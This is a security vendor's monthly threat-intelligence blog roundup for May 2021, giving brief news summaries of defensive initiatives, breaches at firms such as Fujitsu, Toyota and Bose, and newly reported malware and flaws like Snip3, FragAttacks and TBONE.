Go to listing page

Cyware Monthly Threat Intelligence, May 2021

Cyware Monthly Threat Intelligence, May 2021

Share Blog Post

The Good

In the top news for the month, President Joe Biden an extensive executive order on improving the cybersecurity stature of the U.S. Meanwhile, top browser makers Google and Mozilla came along to develop an API to fend off XSS attacks. Advancing its cybersecurity posture, the U.S. Coast Guard announced to establish its own red team to take on cybersecurity threats.

  • After an overhaul that focuses on cybersecurity spending, the U.S. President finally signed an executive order to strengthen the country’s cybersecurity defenses. The order comes as a response to the recent SolarWinds and other significant attacks carried out by foreign threat actors.
  • Google, Mozilla, and security firm Cure53 announced to develop an API that sanitizes HTML input strings and prevents cross-site scripting (XSS) attacks. The API will be integrated into future versions of Mozilla Firefox and Google Chrome browsers.
  • A researcher from HSE University proposed a new algorithm to assess vulnerabilities in encryption programs, leveraging a brute-force search of possible options of symbol deciphering.
  • Microsoft released an open-source lab environment SimuLand that will help test and strengthen Microsoft 365 Defender, Azure Sentinel, and Azure Defender against real attack scenarios.
  • The U.S. Coast Guard announced the establishment of its first-ever red team under the Cyber Operational Assessments Branch to bolster its cyber defenses. It will transform its enterprise cyber blue team into a more comprehensive task force.
  • The U.K’s NCSC rolled out a free cyber threat warning service that gives timely notification about possible incidents and security issues. The service, called Early Warning, is the latest Active Cyber Defence service from the NCSC.

The Bad

From healthcare to audio device manufacturers, several global firms, such as Fujitsu, Bose, and Toyota, faced interruptions in services due to cyberattacks. Threats racked up against government agencies in Australia, Belgium, and Indonesia that impacted millions of citizens. Moreover, the new Agrius group from Iran launched disruptive attacks against Israeli targets.

  • Fujitsu was forced to temporarily shut down its ProjectWEB SaaS platform after cyberattacks on multiple Japanese government entities, including the Ministry of Land, Infrastructure, Transport and Tourism; the Ministry of Foreign Affairs; the Cabinet Secretariat; and the Narita Airport. 
  • Microsoft disclosed that the Russia-based APT29 threat actor targeted around 150 government agencies, consultants, think tanks, and NGOs across at least 24 nations. The group behind the SolarWinds attack also breached the networks of the United States Agency for International Development’s (USAID) email marketing service, Constant Contact.
  • Private patient info was released to media outlets by hackers who targeted hospitals in New Zealand’s Waikato district. The hackers gained unauthorized access to documents containing names, phone numbers, and addresses of patients and staff.
  • A pair of attacks hit Toyota. While the first one attacked Daihatsu Diesel, a subsidiary of Toyota; the other one was launched against Auto Parts Manufacturing Mississippi, another subsidiary. 
  • Bose Corporation suffered a data breach that occurred due to a ransomware attack in March. The personal information—social security numbers, compensation information, and other HR-related details—of some of its current and former employees was accessed by the attackers. 
  • A cryptocurrency scam that hit some members of Reddit’s WallStreetBets forum resulted in a loss of $2 million. Criminals reportedly misled people in a fake transaction on Telegram.
  • The Iranian hacking group Agrius came up with a new destructible wiper malware Apostle that includes the functionality of wiper and ransomware. The new malware primarily focuses on cyberespionage and destruction and demands a ransom posing as ransomware actors.
  • The Avaddon ransomware gang threatened to release sensitive information, including passport images, driver’s licenses, and employment contracts, belonging to the NSW Labor Party of Australia after gaining access to its computer network in a major cyberattack. 
  • A database belonging to Bergen Logistics remained exposed for public access without any security authentication. It included 467,979 records, containing names, addresses, order numbers, and email addresses, all relevant to shipments and customers. 
  • More than 200 organizations in Belgium were affected by a DDoS attack that took the country’s internet offline. The affected entities include government, parliament, universities, and research institutes. 
  • An Iranian hacker group identified as N3tw0rm threatened to release 110GB of data belonging to H&M Israel. The group is suspected to be affiliated with the Iran-linked Pay2Key.
  • Indonesia’s government admitted to the leak of the personal data of millions of citizens on the RaidForums dark web market. The data was stolen from a national health insurance scheme Badan Penyelenggara Jaminan Sosial (BPJS).
  • Australian digital real estate business Domain Group fell victim to a phishing attack that targeted its users by asking them to pay a deposit to secure rental property on a website nominated by the scammer. 
  • Taxpayers in South Korea, Australia, and the U.S. are being targeted in a phishing campaign pretending to be accounting ledgers. The campaign is used to distribute RATs.

New Threats

New vulnerabilities, phishing techniques, and malware actors tried well enough to undermine organizations’ efforts to subdue them. While FragAttacks flaws concern WiFi devices, the new Snip3 deploys multiple RAT families and features exceptional evasive behavior. Moreover, flaws in multiple Android apps were found risking the data of 100 million users.

  • A total of 12 design and implementation flaws, dubbed FragAttacks, in IEEE 802.11 technical standards were discovered in WiFi devices, rendering them vulnerable to attacks. These flaws can be exploited by attackers within the radio range of the target.
  • Personal data—names, email addresses, dates of birth, chat messages, location, and payment details—of over 100 million Android users was exposed due to unprotected databases used by 23 apps. Some of the apps are Logo Maker, Astro Guru, and T’Leva.
  • A new and stealthy malware loader called Snip3 was part of an ongoing phishing campaign that targeted aerospace and travel organizations. The malware loader has been used to drop Revenge RAT, AsyncRAT, Agent Tesla, and NetWire RAT on compromised systems.
  • In a new technique, the Magecart group 12 was identified hiding web shells known as Smilodon or Megalodon inside website favicons. These web shells were used to dynamically load JavaScript skimming code via server-side requests into online stores.
  • Researchers observed an updated version of Lemon Duck cryptomining botnet that targeted unpatched Microsoft Exchange servers and attempted to execute payloads for Cobalt Strike DNS beacons.
  • Three new malware, DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, were associated with a massive cyberespionage campaign that targeted many organizations in the U.S. Launched via phishing emails, the attacks were carried out by a new uncategorized group - UNC2529.
  • A new cryptocurrency stealer variant, Panda Stealer, was found targeting individuals across the U.S., Australia, Japan, and Germany. It is being spread through a global spam campaign that leverages Discord channels. 
  • The new Buer malware loader variant was being propagated via phishing emails. Dubbed RustyBuer, the new strain is written in Rust language and is capable of delivering Cobalt Strike Beacon as a second-stage payload.
  • Researchers demonstrated a new attack technique, dubbed TBONE, that can enable attackers to hack Tesla and other cars remotely without any user interaction. It abuses two vulnerabilities affecting ConnMan, an internet connection manager for embedded devices.
  • Moriya, a previously unknown rootkit, was used by unknown threat actors to execute passive backdoors on public-facing servers. It allows the attackers to spy on victim network traffic. This rootkit is part of the TunnelSnake campaign.
  • The Royal Mail delivery firm, once again, came into the crosshairs of scammers aiming to evade security checks in a new phishing scam. The scam is initiated with recipients receiving SMS messages claiming that a parcel has been redirected to the local post office due to an unpaid shipping fee.


php webshell
snip3 crypter
moriya rootkit
panda stealer
tbone attack

Posted on: June 01, 2021

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.